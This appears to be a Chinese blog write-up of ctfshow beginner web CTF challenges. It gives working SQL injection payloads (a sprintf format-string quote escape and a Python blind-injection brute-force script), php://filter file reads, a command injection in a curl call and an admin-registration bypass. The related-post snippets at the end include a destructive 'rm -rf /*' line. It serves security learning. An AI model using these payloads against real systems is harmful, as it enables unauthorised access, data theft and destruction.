ctfshow web 萌新赛

于 2024-05-23 12:45:49 发布
阅读量321 收藏 1
点赞数 5
分类专栏: 公开赛 文章标签: 前端 android web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/139112698
版权

给他

谐音.git
在这里插入图片描述
用githack还原文件
在这里插入图片描述

<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>

用addslashes函数进行转义
它会在以下字符前添加反斜杠(\):

单引号 (')
双引号 (")
反斜杠 (\)
NULL 字符

sprintf 利用的原理是%1$\为空,所以我们构造%1$'单引号前的转义符会被置空。从而实现单引号逃逸

在这里插入图片描述
?name=admin&pass=%1$’ or 1=1%23

在这里插入图片描述
同时发现多了个cookie
在这里插入图片描述

php://filter/convert.base64-encode/source=/flag
发现被过滤了这里只能使用rot13
php://filter/read=string.toupper|string.rot13/resource=/flag

得到flag还要解密,我都忘了

签到题

<?php 
if(isset($_GET['url'])){
        system("curl https://".$_GET['url'].".ctf.show");
}else{
        show_source(__FILE__);
}
 ?>

闭合就行

?url=;tac flag;

数学及格了

靶机没了

假赛生

扫一下发现
有登录和注册页面

<?php
session_start();
include('config.php');
if(empty($_SESSION['name'])){
    show_source("index.php");
}else{
    $name=$_SESSION['name'];
    $sql='select pass from user where name="'.$name.'"';
    echo $sql."<br />";
    system('4rfvbgt56yhn.sh');
    $query=mysqli_query($conn,$sql);
    $result=mysqli_fetch_assoc($query);
    if($name==='admin'){
        echo "admin!!!!!"."<br />";
        if(isset($_GET['c'])){
            preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);
            echo $flag;
        }else{
            echo "you not admin";
        }
    }
}
?>

这里有个name是admin,我们就注册就行了,后面加个空格绕过
然后登录之后传c为空就有flag
在这里插入图片描述
不行有点搞笑,感觉像qj

萌新记忆

用户名为admin

#author:羽
import requests
url='http://bbdf98cd-7839-4c00-938d-3d1e20bbfc25.challenge.ctf.show/admin/checklogin.php'
s= '0123456789abcdefghijklmnopqrstuvwxyz'
flag=''
for i in range(1,18):
        print('*')
        for j in s:
            data={"u":"'||substr(p,"+str(i)+",1)<'"+j,
                          "p":"1"
                }
            r=requests.post(url,data=data)
            #print(r.text)
            if "密码错误" == r.text:
                flag+=chr(ord(j)-1)
                print(flag)
                break
baozongwi
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-WEB-萌新-wp
F1rstb100d
09-03 589
ctfshow-WEB-萌新-wp
CTFShow:萌新web1
weixin_64089259的博客
04-14 908
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
ctfshow-web萌新(详解)
m0_63641882的博客
11-06 325
1.addslashes函数+sping的漏洞2.cookie的盗用3.代码审计+正则过滤。
ctfshow 萌新 web部分
最新发布
weixin_74427106的博客
12-09 102
在题目已经提示了有两个页面,一个是register.php,一个是login.php去访问这两个页面,访问之后一个是注册页面,一个是登录页面,在注册页面用admin发现注册不成功,用admin+空格发现能够注册成功了,在用admin和你注册的密码进行登录发现能够登录成功,登录之后,我们在回过头开始分析代码,一个最重要的代码就是。addslashes会将'这个字符进行转义,而转义之后就构成了%1$\' or 1=1 --+这个w和小写的W把全部字符都给过滤了,这就利用一个新的姿势,就是用不输入进行过滤。
ctfshw (萌新)
qq_62046696的博客
06-21 618
目录萌新记忆签到题web_假生发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/ (多么菜的领悟>_......
ctfshow之_萌新web1至web7
XiaoXiao_RenHe的专栏
04-29 1446
ctfshow之_萌新web1至web7问题解答;intval、~~sql语句的2次取反、|或运算、^异或运算、
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow萌新经验总结
m0_62422842的博客
06-05 1708
涉及到的相关知识: sql注入中的sprintf格式化字符串漏洞。 基于约束的sql注入攻击。 利用Burpsuite Fuzz实现sql注入
ctfshow 萌新web题解
qq_41788704的博客
10-09 1285
web1 十六进制 0x38e web2 异或 200^800 按位与 992|8 web3 加减乘除都可以 --1000 负负得正 web4 id=1 or 1=1# id=id# 上面是显示所有的数据,flag自然也会在里面 ‘1000’ MySQL会自动转换类型 web5 异或 144^888 web6 取反 ~~1000 web7 二进制 0b1111101000 web8 rm -rf /* 删库跑路?? web9 可以直接执行命令 system('cat config.php
CTFshow_萌新计划——web1~web8
Ho1aAs‘s Blog
10-31 1797
文章目录一、web1~4二、web5~8完 一、web1~4 ·web1 代码审计,要求发送GET请求使id参数为1000即可得到flag,然而需要绕过if下的intval()函数,大于999直接报错。由于PHP是弱语言,此处有两种思路: 逻辑或:?id=999 or id=1000,?id=999 || id=1000此处intval函数得到的值是999,绕过了判断语句,从而执行sql语句,得到flag 加号:?id=999+1利用了弱语言的特性绕过intval,传入sql执行相加得到1000 ·we
ctfshow 萌xinmisc
Demodd的博客
01-24 774
前言 不想学web的时候,刷misc摸鱼(然后摸的有点久),萌xin的题做起来也有点点点点点点费劲。。。 qrcode 打开txt发现txt里只有01查看长度发现是625位,根据题目名称明显是25*25的二维码 from PIL import Image strings = open('qrcode.txt','r').read() print(strings) pic = Image.new("RGB",(25,25)) num = 0 for x in range(25): for y in
ctfshow 萌xin
weixin_63231007的博客
04-25 1524
萌新 给她 git源码泄露.得到源码为 <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 查看别人题解,里写了有关sprintf函数的作用漏洞。从WordPress SQLi谈PHP格式化字符串问题(2017.11.01更新)
ctfshow萌新web
qq_44657899的博客
08-17 3577
文章目录萌新web_给她 萌新web_给她 首先由题目给她可以联想出git源码泄露。 得到的源码如下: <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 这里有个sprintf()函数没有看到过,搜了搜它的作用和漏洞,看到一个和本题很像的例子
CTFSHOW 萌新
qq_45655564的博客
08-10 970
给她 听名字是git泄露,但是不知道是不是我的字典有问题,没有扫出来有用的信息。 结果只能翻别人的wp了,得知了hint.php <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> sprintf是有一个漏洞的,就是占位符漏洞。 ...
ctfshow web萌新
09-01
对于CTF Show的web,作为一个萌新,你可以尝试以下几个方向来提升自己的能力: 1. 学习Web基础知识:了解HTTP协议、HTML、CSS、JavaScript等基础知识,并掌握常见的Web漏洞类型和攻防技巧,如跨站脚本攻击(XSS)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值